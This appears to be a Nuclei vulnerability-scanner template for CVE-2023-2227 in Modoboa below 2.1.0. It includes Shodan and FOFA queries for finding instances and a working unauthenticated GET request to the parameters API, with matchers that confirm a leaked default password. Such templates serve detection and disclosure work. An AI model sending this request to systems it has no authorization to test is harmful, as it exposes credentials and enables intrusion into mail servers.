id: CVE-2023-2227

info:
  name: Modoboa < 2.1.0 - Improper Authorization
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
  impact: |
    Unauthenticated attackers can access sensitive configuration parameters, including default passwords and authentication settings, through the API endpoint, potentially compromising the entire email management system.
  remediation: |
    Update Modoboa to version 2.1.0 or later, which implements proper authorization checks for the parameters API endpoint.
  reference:
    - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3
    - https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2227
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-2227
    cwe-id: CWE-285
    epss-score: 0.77817
    epss-percentile: 0.99018
    cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: modoboa
    product: modoboa
    shodan-query:
      - "http.favicon.hash:1949005079"
      - http.html:"modoboa"
    fofa-query:
      - "body=\"Modoboa\""
      - body="modoboa"
      - icon_hash=1949005079
  tags: cve,cve2023,modoboa,exposure,disclosure,vuln

http:
  - raw:
      - |
        GET /api/v2/parameters/core/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: 7h3h4ckv157

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'label":'
          - 'default_password":'
          - 'authentication_type":"local'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402202f1cf0cfebba15fe32230197c42abd2e66b5c6fb09f2f752bf22aaced19b7fcf0220135a95561a3a7d4f6e1123a56bffcbe51f3d69d572fb97686703ee30bff4bf39:922c64590222798bb761d5b6d8e72950